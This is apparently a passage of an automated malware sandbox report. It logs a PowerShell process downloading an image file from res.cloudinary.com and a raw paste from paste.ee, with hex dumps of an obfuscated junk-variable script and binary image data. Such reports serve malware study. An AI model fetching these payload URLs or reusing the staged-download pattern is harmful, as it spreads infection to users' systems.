                                                                                                                                          2024-12-14 13:00:14 UTC1378INData Raw: 66 47 4b 4c 20 3d 20 22 57 57 41 4e 63 63 4b 41 51 65 57 57 53 69 70 22 0d 0a 53 52 68 75 7a 4c 4f 47 62 50 74 62 55 64 54 20 3d 20 22 71 57 68 65 4c 6c 75 4c 66 51 50 66 4c 4c 4b 22 0d 0a 71 55 62 62 66 69 7a 47 4c 63 57 5a 67 71 69 20 3d 20 22 6d 75 57 69 68 63 69 62 69 43 66 66 4e 71 47 22 0d 0a 5a 78 6f 42 6b 5a 47 6b 4e 4c 4c 4b 42 41 55 20 3d 20 22 43 6b 47 5a 41 4b 6d 65 74 53 4c 73 69 70 54 22 0d 0a 55 57 4b 63 74 4b 63 41 4e 74 4c 47 57 57 74 20 3d 20 22 4e 42 5a 6c 65 4b 6d 64 64 47 55 50 55 69 55 22 0d 0a 0d 0a 69 72 49 4c 63 74 52 69 4e 47 4b 76 67 42 4c 20 3d 20 22 63 6d 55 7a 69 50 6a 4e 71 76 5a 4b 62 5a 4c 22 0d 0a 74 69 5a 6b 50 63 65 47 61 4c 6e 57 69 41 4c 20 3d 20 22 4e 61 4b 57 64 61 73 67 63 4e 70 63 47 69 72 22 0d 0a 69 57 5a 4c 55
                                                                                                                                          Data Ascii: fGKL = "WWANccKAQeWWSip"SRhuzLOGbPtbUdT = "qWheLluLfQPfLLK"qUbbfizGLcWZgqi = "muWihcibiCffNqG"ZxoBkZGkNLLKBAU = "CkGZAKmetSLsipT"UWKctKcANtLGWWt = "NBZleKmddGUPUiU"irILctRiNGKvgBL = "cmUziPjNqvZKbZL"tiZkPceGaLnWiAL = "NaKWdasgcNpcGir"iWZLU
                                                                                                                                          2024-12-14 13:00:14 UTC1378INData Raw: 6a 6b 66 20 3d 20 22 49 65 43 4e 4c 6f 6c 66 57 4e 53 6b 52 4b 65 22 0d 0a 67 4c 6c 63 64 47 63 57 47 4e 6d 62 4c 76 41 20 3d 20 22 57 52 70 4b 4b 4b 55 4c 57 55 4c 4f 55 4c 65 22 0d 0a 6f 55 43 55 66 6b 47 50 62 70 4b 6c 57 66 55 20 3d 20 22 75 57 6f 63 4c 6e 41 6a 70 7a 57 69 54 4b 57 22 0d 0a 6e 62 4b 5a 67 68 53 54 41 4b 61 61 51 52 55 20 3d 20 22 7a 41 4c 57 4f 4c 4e 6d 47 78 51 57 4e 6f 70 22 0d 0a 54 65 65 42 55 6b 6c 70 6f 6e 6f 6f 4c 6b 50 20 3d 20 22 6b 68 69 62 7a 57 57 4e 4c 69 63 73 6c 43 55 22 0d 0a 51 57 62 4c 63 71 55 4f 50 4c 42 55 43 66 41 20 3d 20 22 41 48 50 61 70 57 47 6a 6b 4a 4e 55 57 57 69 22 0d 0a 74 70 69 4a 55 68 6f 70 43 51 7a 57 4b 62 4c 20 3d 20 22 55 53 74 4f 6e 4c 6c 4c 6b 63 6b 6d 4b 62 57 22 0d 0a 6b 55 68 6c 63 6f 55 47
                                                                                                                                          Data Ascii: jkf = "IeCNLolfWNSkRKe"gLlcdGcWGNmbLvA = "WRpKKKULWULOULe"oUCUfkGPbpKlWfU = "uWocLnAjpzWiTKW"nbKZghSTAKaaQRU = "zALWOLNmGxQWNop"TeeBUklponooLkP = "khibzWWNLicslCU"QWbLcqUOPLBUCfA = "AHPapWGjkJNUWWi"tpiJUhopCQzWKbL = "UStOnLlLkckmKbW"kUhlcoUG
                                                                                                                                          2024-12-14 13:00:14 UTC1378INData Raw: 20 3d 20 22 50 68 4b 43 55 53 47 6b 4a 48 57 66 63 6a 4b 22 0d 0a 0d 0a 68 61 47 61 42 70 6e 66 57 66 63 55 6d 55 4f 20 3d 20 22 52 63 4b 55 61 70 7a 4c 57 4c 4b 5a 63 63 5a 22 0d 0a 61 68 4c 52 63 43 43 4b 70 65 4c 48 68 6f 69 20 3d 20 22 4b 6f 67 47 6b 57 65 6b 6b 4e 6b 57 5a 6b 68 22 0d 0a 6f 50 6b 6c 4c 65 78 4b 62 6b 6d 6e 68 6c 4c 20 3d 20 22 6b 65 4b 63 43 6e 55 69 4c 66 65 50 6c 4c 57 22 0d 0a 6d 6b 63 4c 55 69 4c 4a 4c 76 75 63 41 41 4c 20 3d 20 22 4f 4c 76 4e 70 62 4f 63 57 4e 57 62 61 50 57 22 0d 0a 66 55 63 6a 68 4b 68 47 55 4c 57 65 75 65 6b 20 3d 20 22 42 67 4c 69 6f 4e 6e 78 4f 55 4c 4f 4e 6f 6d 22 0d 0a 4b 68 64 47 62 61 47 69 4e 66 4a 6b 61 4c 68 20 3d 20 22 70 41 76 6a 63 76 47 57 69 65 69 4c 57 69 67 22 0d 0a 4a 69 6c 4b 52 4c 57 64 62
                                                                                                                                          Data Ascii: = "PhKCUSGkJHWfcjK"haGaBpnfWfcUmUO = "RcKUapzLWLKZccZ"ahLRcCCKpeLHhoi = "KogGkWekkNkWZkh"oPklLexKbkmnhlL = "keKcCnUiLfePlLW"mkcLUiLJLvucAAL = "OLvNpbOcWNWbaPW"fUcjhKhGULWeuek = "BgLioNnxOULONom"KhdGbaGiNfJkaLh = "pAvjcvGWieiLWig"JilKRLWdb
                                                                                                                                          2024-12-14 13:00:14 UTC1378INData Raw: 3d 20 22 4b 65 4c 4c 6b 4b 73 52 71 6b 50 4c 4c 57 4b 22 0d 0a 41 76 42 78 54 53 57 6e 6b 78 66 4c 74 4c 78 20 3d 20 22 43 50 5a 52 71 5a 57 74 57 4e 4c 4c 69 6b 52 22 0d 0a 4b 71 69 62 47 57 55 4c 6d 66 65 41 70 57 4f 20 3d 20 22 49 50 63 6f 6b 4b 61 63 4c 63 6e 42 42 6b 6c 22 0d 0a 43 4f 63 74 68 68 6c 57 49 6e 43 63 75 6e 57 20 3d 20 22 4a 49 6c 65 4b 66 4b 4c 4b 71 41 63 6e 62 66 22 0d 0a 0d 0a 4c 57 4c 66 57 6b 5a 47 61 6d 55 4c 5a 6c 4c 20 3d 20 22 55 72 69 69 47 4b 4b 6d 4b 6e 6e 61 43 71 50 22 0d 0a 55 57 62 4c 75 5a 52 63 65 74 4e 4c 57 70 54 20 3d 20 22 6f 6f 69 63 52 69 6f 4c 57 41 57 49 57 63 4c 22 0d 0a 50 6c 7a 73 50 7a 6f 50 57 49 55 57 50 69 57 20 3d 20 22 4c 6b 43 76 51 69 52 57 69 7a 69 42 49 41 57 22 0d 0a 66 69 70 52 5a 57 63 70 62 63
                                                                                                                                          Data Ascii: = "KeLLkKsRqkPLLWK"AvBxTSWnkxfLtLx = "CPZRqZWtWNLLikR"KqibGWULmfeApWO = "IPcokKacLcnBBkl"COcthhlWInCcunW = "JIleKfKLKqAcnbf"LWLfWkZGamULZlL = "UriiGKKmKnnaCqP"UWbLuZRcetNLWpT = "ooicRioLWAWIWcL"PlzsPzoPWIUWPiW = "LkCvQiRWiziBIAW"fipRZWcpbc
                                                                                                                                          2024-12-14 13:00:14 UTC1378INData Raw: 20 22 65 78 4e 55 47 49 6b 4b 5a 4c 64 42 6f 6d 7a 22 0d 0a 50 63 47 50 6a 63 6f 6e 50 4e 57 69 55 5a 6f 20 3d 20 22 47 7a 47 65 4f 57 66 50 47 74 6d 51 74 7a 4c 22 0d 0a 42 6b 57 53 57 41 71 61 61 63 7a 50 4c 47 69 20 3d 20 22 4c 78 66 57 4b 41 4c 57 42 4c 6d 75 57 74 6a 22 0d 0a 65 47 69 57 69 50 6c 65 73 68 69 71 49 4b 6e 20 3d 20 22 6d 51 41 6f 65 4c 4c 5a 61 51 47 57 63 6b 55 22 0d 0a 61 4b 4b 78 57 47 42 6d 48 41 6a 57 47 4b 4e 20 3d 20 22 4b 61 6b 42 71 61 4c 57 61 78 68 43 62 50 52 22 0d 0a 57 57 57 4b 68 69 4c 70 7a 52 4c 4b 4b 6f 4c 20 3d 20 22 57 63 4e 54 61 42 6c 4e 63 6d 47 50 61 6b 4b 22 0d 0a 6e 5a 69 57 5a 47 5a 57 6c 4c 62 55 6f 54 47 20 3d 20 22 4c 6e 57 6f 76 7a 4c 41 71 4b 62 68 66 74 4b 22 0d 0a 0d 0a 7a 69 47 65 71 69 4b 4e 4c 75 57
                                                                                                                                          Data Ascii: "exNUGIkKZLdBomz"PcGPjconPNWiUZo = "GzGeOWfPGtmQtzL"BkWSWAqaaczPLGi = "LxfWKALWBLmuWtj"eGiWiPleshiqIKn = "mQAoeLLZaQGWckU"aKKxWGBmHAjWGKN = "KakBqaLWaxhCbPR"WWWKhiLpzRLKKoL = "WcNTaBlNcmGPakK"nZiWZGZWlLbUoTG = "LnWovzLAqKbhftK"ziGeqiKNLuW


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          1192.168.2.1249711151.101.193.1374436372C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-12-14 13:00:20 UTC127OUTGET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1
                                                                                                                                          Host: res.cloudinary.com
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          2024-12-14 13:00:20 UTC803INHTTP/1.1 200 OK
                                                                                                                                          Connection: close
                                                                                                                                          Content-Length: 2230233
                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                          Etag: "7b9a6708dc7c92995f443d0b41dbc8d0"
                                                                                                                                          Last-Modified: Mon, 02 Dec 2024 10:22:29 GMT
                                                                                                                                          Date: Sat, 14 Dec 2024 13:00:20 GMT
                                                                                                                                          Strict-Transport-Security: max-age=604800
                                                                                                                                          Cache-Control: public, no-transform, immutable, max-age=2592000
                                                                                                                                          Server-Timing: cld-fastly;dur=187;cpu=2;start=2024-12-14T13:00:20.583Z;desc=miss,rtt;dur=169,content-info;desc="width=1920,height=1080,bytes=2230233,o=1,ef=(17)",cloudinary;dur=176;start=2024-12-14T13:00:20.588Z
                                                                                                                                          Server: Cloudinary
                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          Access-Control-Expose-Headers: Content-Length,ETag,Server-Timing,X-Content-Type-Options
                                                                                                                                          x-request-id: 6f487a4c60d72621f2efeecff85ca20a
                                                                                                                                          2024-12-14 13:00:20 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                                                                                                          Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                                                                                                          2024-12-14 13:00:20 UTC1378INData Raw: 77 24 91 80 f7 ed aa 38 13 c5 74 2e 92 f9 a4 19 c0 50 c1 95 13 cc f4 aa d7 4f e2 f4 f6 cf 9a 34 12 6a 34 d1 ac 34 c0 35 95 3d b3 e9 ff 00 b5 df 0d 9e 5f 16 d1 c2 37 3c 8c ae 62 55 46 b2 4b 70 2d 85 9e 48 cf 03 04 29 1a 02 c8 cb 27 e1 22 e8 8f 87 f3 c0 63 45 08 87 48 b1 94 0b b9 a8 91 99 9a b8 22 87 5d 10 0c cd 1b b7 a8 92 00 02 e8 d6 6a e9 8a 5b 07 65 52 c0 a8 46 37 fa 62 5a 9d 3c 47 59 18 29 b4 1d c3 d2 47 3f 4c 09 9f 4f a7 74 d3 90 78 2c c0 37 bf 3c 73 8a 10 92 a8 46 da b2 2c 8a a8 77 71 9b 83 4e 8f 0a 82 ab ed c1 ac ce 7f 04 8d 35 22 50 e5 08 6b aa b1 81 68 b5 2c ec eb e5 80 55 14 32 31 a5 53 75 63 e7 97 d6 cd 1e a2 6d 36 91 ee de 4f 55 76 14 79 07 0b 2b 22 ef 72 88 c0 2f a9 8a 8e 6b 31 f4 8c da ed 7c d2 10 5c 85 3b 2c d5 0a 23 a6 06 b8 8b 6f 90 b0 bc
                                                                                                                                          Data Ascii: w$8t.PO4j445=_7<bUFKp-H)'"cEH"]j[eRF7bZ<GY)G?LOtx,7<sF,wqN5"Pkh,U21Sucm6OUvy+"r/k1|\;,#o
                                                                                                                                          2024-12-14 13:00:20 UTC1378INData Raw: 8c cd 80 06 22 88 00 fb 74 c5 c6 89 f4 fe 2d 26 ab ef 2f e5 b0 1e 8a 15 d3 03 7b ef a3 82 6d 4f 7c 20 f1 02 0b 6d 76 25 85 73 99 62 5f 34 d8 1c 7b e1 83 10 a3 8a b3 d7 01 8d 66 a0 49 0c 6a 5b 68 dc c7 75 e1 74 7a 92 cc 1f 71 de be 96 e6 f7 0f 7c c8 f1 3d 3b 6a 61 8e 38 e5 68 88 53 ea 51 cd e4 69 8b 69 b6 02 ec e5 68 59 ea 78 eb 81 ea 25 9c b2 90 2b 69 19 91 39 68 a6 8e 4d 96 a1 83 30 63 c6 30 9a 85 d8 ac 59 55 5b 81 67 92 71 2f 14 95 e6 85 a2 86 89 65 2a 6b b5 e0 6a 45 e2 ed 26 a4 45 1f aa 31 d4 a9 e0 1f 6c cd 97 c4 4b c9 2b 9e 77 31 20 fd 71 4d 32 2f 84 e8 00 6d cc e7 80 7b 9f 8e 27 14 ca fc 0f c3 cf 24 60 3a 67 91 e4 34 0b 1a be b9 07 54 77 8b e0 11 ef df 04 93 a2 2b 51 f5 1e 2b e1 99 7a 9d 2e ac 78 92 ce 35 2d f7 72 2b cb a1 5f 3c 0d 4d 46 b0 24 43 7b
                                                                                                                                          Data Ascii: "t-&/{mO| mv%sb_4{fIj[hutzq|=;ja8hSQiihYx%+i9hM0c0YU[gq/e*kjE&E1lK+w1 qM2/m{'$`:g4Tw+Q+z.x5-r+_<MF$C{
                                                                                                                                          2024-12-14 13:00:20 UTC1378INData Raw: 66 6d 4b f8 66 a7 61 05 96 26 b5 23 f1 70 73 f3 be ae 35 fb ac f2 15 01 99 ef 9e a3 9e d9 f5 ef 18 fb 5d a0 0b 26 92 09 a3 77 64 65 26 fe 07 fe bf ae 7c 9f 57 2c 6f e1 f2 21 70 ae ac 0d 7b e0 62 6c 20 6e 07 80 31 dd 33 bb 44 39 b3 7c 83 8a 79 8d b8 86 e0 1e 31 9d 15 14 65 07 a6 03 88 18 2d 95 5e 72 e2 32 ca 6d 45 1c ac a8 16 35 3b e8 8c a9 d4 24 41 44 8e 59 8f 4e 0e 01 3c b5 58 f6 8b 5a 3c 57 4c 80 be e2 fe 63 38 92 e0 90 f4 3a d6 5c be c4 0e ce 02 81 f9 e0 42 26 e0 56 94 1f 6c 23 82 aa 2d 54 0d c4 8f 8e 29 06 b5 25 76 51 e8 3d af be 32 1d 5c 6d 2c 09 1d f0 0f 13 72 3a 7d 71 b5 72 07 52 7e 03 33 d0 d6 da 3c f7 c6 44 6b d2 46 56 37 55 7d 0e 01 0c 8f 24 8a 63 ba f6 03 bf b6 3a 74 d3 3c 51 3c 60 33 49 b7 d3 e9 0c 2f a1 da 1b 77 36 39 34 39 1e f9 5d 14 f0 e9
                                                                                                                                          Data Ascii: fmKfa&#ps5]&wde&|W,o!p{bl n13D9|y1e-^r2mE5;$ADYN<XZ<WLc8:\B&Vl#-T)%vQ=2\m,r:}qrR~3<DkFV7U}$c:t<Q<`3I/w6949]
                                                                                                                                          2024-12-14 13:00:20 UTC1378INData Raw: 02 f2 41 e0 62 ed a9 02 44 70 8a c0 0b 66 63 c8 f9 65 03 79 a4 21 b2 3a 71 db 03 2e c8 9c 24 7b 9a fa fc 06 07 ba 3a c5 79 3c b6 3b 59 7b 91 f8 be 58 b6 b4 02 37 6d e7 bf c7 25 cd 2d 06 2c 3f 17 06 b1 43 36 d6 28 cc d4 dc 82 47 4f ae 00 1d 03 03 e9 c0 ec 01 b6 ed e9 8e 05 3b 6a ab db e3 95 f2 8b 03 5c 0e f8 0b 30 55 21 42 96 63 d1 47 7c 22 e8 dc 95 79 9d ae ec 20 6e 07 cf 0e a8 ab ca a5 03 d0 e5 e2 47 67 a2 2e b0 07 20 26 43 e9 ed c7 1f d7 2a 51 c2 9b 5e b8 47 23 71 04 51 ca 16 24 71 80 22 18 70 16 b2 e8 8c 48 39 60 bc d0 be 7a d6 6a 78 57 86 2e b9 a5 56 b5 0a bf 89 7a 86 c0 48 0f 49 17 47 2b b5 98 10 1b 93 c0 cf 56 3c 0f 47 c3 04 90 81 41 bd 46 c9 ae bc 63 71 e8 74 b1 a8 03 4d 18 ae fb 45 fe 67 03 c2 18 66 d3 b5 14 60 4f 3e ae f9 74 0c ec 41 5c f7 6f a7
                                                                                                                                          Data Ascii: AbDpfcey!:q.${:y<;Y{X7m%-,?C6(GO;j\0U!BcG|"y nGg. &C*Q^G#qQ$q"pH9`zjxW.VzHIG+V<GAFcqtMEgf`O>tA\o
                                                                                                                                          2024-12-14 13:00:20 UTC1378INData Raw: f1 15 94 48 14 8d b6 ca df a7 03 e9 f1 cc df b0 9a 89 a3 d3 7d a7 48 0c aa 4f 84 33 7a 05 9a 12 c4 39 ae db 49 07 e1 78 6f b5 a3 56 df b4 cd 42 6a db 6c ad a8 85 db 71 e8 19 51 81 f8 0a 38 1e fb ed 9c ba 65 d2 cd f6 82 49 4c da 88 d8 68 f4 fb a3 2c b1 f9 91 ee 2f 67 f1 10 a1 80 1d 8b 03 db 3e 6f a5 7d 2b 49 12 ef 8d 83 7e 0e 3a 8a 24 9e 9c 1f 7f 9e 7b 5f da 44 2f a0 f0 ff 00 0d 48 24 46 1a ad 05 36 c4 5a 71 4a 40 aa e7 9a e7 3e 65 f7 7d 42 08 d6 35 7a f2 dd 94 dd 6d 62 bd 30 35 27 d2 46 65 8a 40 54 aa 93 60 8b fd 30 5e 46 98 ea 15 46 9d 41 55 2d c8 a1 f9 74 c4 92 09 9f 4c c3 d4 a4 44 a1 94 25 7a 87 23 a9 e4 f1 97 58 35 0d 34 6e c8 f4 ec 25 2c 79 da 45 d0 fc ab 03 61 20 d3 6d dd b1 16 bd 94 56 56 5d 3e 92 65 37 1a 5d 75 0b 99 9a 6d 43 a4 c1 0e 9a c9 dc 4b
                                                                                                                                          Data Ascii: H}HO3z9IxoVBjlqQ8eILh,/g>o}+I~:${_D/H$F6ZqJ@>e}B5zmb05'Fe@T`0^FFAU-tLD%z#X54n%,yEa mVV]>e7]umCK
                                                                                                                                          2024-12-14 13:00:20 UTC1378INData Raw: 0f 38 48 fe dc e9 54 9b 82 4d fd 58 12 28 e7 cf e7 79 21 87 cc 2e ca e0 72 a8 2f 13 89 e4 d5 5b c6 ee 48 fc 4a c2 b0 3d e6 a7 ed f6 98 ea 3f 79 a6 90 83 de c0 c9 3f 6c 74 82 88 d3 b8 53 ec dc e7 cf a5 47 2d be 6b bb a0 06 3f 04 cd 0a 82 f0 2c 8a dc 0d d8 1e b9 be da e9 18 d7 95 29 3d bd 57 94 7f b7 3a 54 50 7e eb 2b 3d 55 93 9e 6a 2d 56 9b 54 ac 53 49 12 95 34 48 26 ef 17 95 d7 cc 56 11 2f c4 73 c6 07 a8 9b ed f6 8a 14 2c 74 ce 1a ba 6e ac cb f0 9f b5 be 11 e1 d3 4b 20 4d 43 bc c7 73 6e 6b 0a 7d 80 ac cd 30 69 b5 3e 96 d2 a3 12 3f 10 ea 33 16 5f 04 d4 0d 63 46 8b 69 d4 37 41 81 bf e3 9f 6c e5 d4 f8 a4 53 78 74 af 0c 51 0d db 4d 90 cd ec 46 7a 78 be de e8 bc a5 59 f4 ec d2 6c 05 88 60 05 9f 60 73 c1 41 e0 b1 23 7e f8 b3 f1 cf 6a 39 a9 f7 7d 24 6a 0b a0 07
                                                                                                                                          Data Ascii: 8HTMX(y!.r/[HJ=?y?ltSG-k?,)=W:TP~+=Uj-VTSI4H&V/s,tnK MCsnk}0i>?3_cFi7AlSxtQMFzxYl``sA#~j9}$j
                                                                                                                                          2024-12-14 13:00:20 UTC1378INData Raw: 93 c3 b9 dc ee 49 76 31 34 6a b8 dc 05 11 d7 8b bc 70 f8 b6 92 49 de 46 2e 1e 55 62 e4 a2 90 58 83 c9 1d f8 24 59 b3 de f3 0e 69 7c cd a2 ec 2a 95 51 55 42 c9 fa f5 38 17 95 15 a4 31 a2 aa b2 83 6b 1d 91 c5 d9 b2 7d b2 da 77 31 22 d4 65 b7 b1 50 7d c8 af ee 30 63 51 21 05 4b 02 0d d9 2a 09 e7 ad 1a b1 91 1c 92 aa 00 ad 41 4e e0 3d 8f 1f db 01 89 35 3b c0 20 15 db de f0 6f a9 56 75 76 dc 48 ed bb 8c 08 5b 4a 17 7d f9 ca 88 49 e2 f9 18 1a 03 c4 23 6b 26 3e a2 b2 24 d6 c3 22 14 64 b1 ef ed 88 84 29 76 39 ca bd 12 08 bf cb 00 a4 c2 14 98 d5 83 0e 84 9c 9d 36 a5 e0 63 42 c9 e7 9c 18 e0 82 47 07 2c 14 16 14 d5 f0 ac 0d 24 f1 5d a4 03 18 2f ee 33 6b 47 ad d3 3e 98 4d 26 91 19 99 d9 77 32 b9 ae 9e a2 43 00 33 ca 86 52 de ae 08 03 9c 29 21 94 85 5e 2a b8 e3 eb d7
                                                                                                                                          Data Ascii: Iv14jpIF.UbX$Yi|*QUB81k}w1"eP}0cQ!K*AN=5; oVuvH[J}I#k&>$"d)v96cBG,$]/3kG>M&w2C3R)!^*
                                                                                                                                          2024-12-14 13:00:20 UTC1378INData Raw: 55 78 17 d8 df cf 2b 2c 4e 80 47 2a b5 05 dd 83 d3 29 55 65 55 65 1b 88 c0 d0 66 49 22 dc ae c1 81 be 17 8e 98 b8 77 8c 15 90 2d 6e ea 32 88 5e 32 40 1b ab 2a 25 32 69 64 0c c3 75 1f cc 74 c0 b4 00 44 43 48 3d 24 9e be d9 57 87 73 82 09 b3 d6 b1 53 aa 77 34 e4 5d 03 47 e5 93 f7 c4 14 49 da 40 2a 7e 3f 96 07 ad 79 e3 61 bd 4e d0 7b e4 95 8a 45 b0 c5 8f c3 02 ba 33 cb 53 00 3b 9c 80 42 b1 3b b9 f9 60 18 ce aa 42 b2 86 1d 2c 76 f9 e3 0e ab 40 03 c5 70 31 00 f6 a4 48 6a fa 1d b8 cc 2f e7 00 a5 a9 94 58 f8 8c 0e 24 5d 61 13 77 6b 03 e1 92 17 af 1f 8b 8b c9 29 b5 49 1f 2c 00 18 b9 2d 6c 4f c7 28 47 15 75 86 08 42 f2 6b 2a c9 e9 3e bc 08 42 03 02 af 44 f7 ba cd 6f 04 d6 47 a2 d4 4a f3 be d5 70 2b 82 6d be 99 8e 14 03 f8 ac e1 01 2b d3 ad 7b d6 07 a4 f1 bd 8b 0a
                                                                                                                                          Data Ascii: Ux+,NG*)UeUefI"w-n2^2@*%2idutDCH=$WsSw4]GI@*~?yaN{E3S;B;`B,v@p1Hj/X$]awk)I,-lO(GuBk*>BDoGJp+m+{
                                                                                                                                          2024-12-14 13:00:20 UTC1378INData Raw: 20 86 62 6f b7 53 95 e9 c1 c0 bc 8f be be 19 5d c4 8a ed 90 7e 1d 32 39 c0 90 48 37 9c 4d 9c e1 d7 9e 99 6a 5f 2e ef d5 7d 3e 18 10 8a 5d c2 8e a7 8c 69 34 c5 24 56 24 30 0d 46 b1 55 b1 ea 1d 46 31 16 a9 92 68 d9 85 aa 90 6b 01 c1 a3 1f 78 16 c0 03 ea 1c d1 c0 ea a1 47 d4 b2 c6 e2 c0 b3 63 fa e0 66 d4 34 f3 16 51 42 c9 03 28 ac 03 31 65 dc 4f 7f 6c 06 e7 83 7e 99 69 cb 32 f7 6e ff 00 2c 5a 39 4a c0 e9 cd 9e 38 cd 24 4f 37 40 10 47 6c 3a 1f ae 27 36 92 58 80 97 69 00 1b 35 81 30 05 58 83 ca 01 00 f7 cf b2 7e cf b4 a9 3f ec fb 47 a6 9e 36 97 4f a8 fb 42 11 94 77 56 88 29 e7 b7 cf b6 7c 6a 58 19 c8 f2 eb 6d 73 66 8f 39 fa 1b f6 20 88 bf 60 e7 77 65 21 f5 ce 36 b3 71 7b 50 00 47 c4 d0 fa e0 7c f3 ec 86 96 0d 24 df 69 61 de cc 9f 72 5f 4c 4e 18 b2 99 62 23 d4
                                                                                                                                          Data Ascii: boS]~29H7Mj_.}>]i4$V$0FUF1hkxGcf4QB(1eOl~i2n,Z9J8$O7@Gl:'6Xi50X~?G6OBwV)|jXmsf9 `we!6q{PG|$iar_LNb#


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          2192.168.2.1249719104.21.84.674436372C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-12-14 13:00:42 UTC67OUTGET /r/iDcBt/0 HTTP/1.1
                                                                                                                                          Host: paste.ee
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          2024-12-14 13:00:42 UTC1286INHTTP/1.1 200 OK
                                                                                                                                          Date: Sat, 14 Dec 2024 13:00:42 GMT
                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Cache-Control: max-age=2592000
                                                                                                                                          strict-transport-security: max-age=63072000
                                                                                                                                          x-frame-options: DENY
                                                                                                                                          x-content-type-options: nosniff
                                                                                                                                          x-xss-protection: 1; mode=block
                                                                                                                                          content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                                                                                                                          CF-Cache-Status: HIT
                                                                                                                                          Age: 57143
                                                                                                                                          Last-Modified: Fri, 13 Dec 2024 21:08:19 GMT
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B05Se2fLFIVa9C5jA4sFrFbxH7AS%2FAKPFjrxZlhQMwGEYuyK0dtuCf23sODaCZvNbm%2FXmIbbhbj6YJA5tkCP0jIN5ownEC8opASdyn8WmpT4MhTdGn68QuR0Vg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8f1e60ded817726e-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          2024-12-14 13:00:42 UTC215INData Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 39 37 39 26 6d 69 6e 5f 72 74 74 3d 31 39 37 33 26 72 74 74 5f 76 61 72 3d 37 35 32 26 73 65 6e 74 3d 35 26 72 65 63 76 3d 37 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 31 37 26 72 65 63 76 5f 62 79 74 65 73 3d 36 38 31 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 31 34 34 34 38 32 39 26 63 77 6e 64 3d 32 32 34 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 38 31 33 38 64 65 30 61 34 64 36 65 36 65 38 64 26 74 73 3d 35 35 33 26 78 3d 30 22 0d 0a 0d 0a
                                                                                                                                          Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=1979&min_rtt=1973&rtt_var=752&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2817&recv_bytes=681&delivery_rate=1444829&cwnd=224&unsent_bytes=0&cid=8138de0a4d6e6e8d&ts=553&x=0"
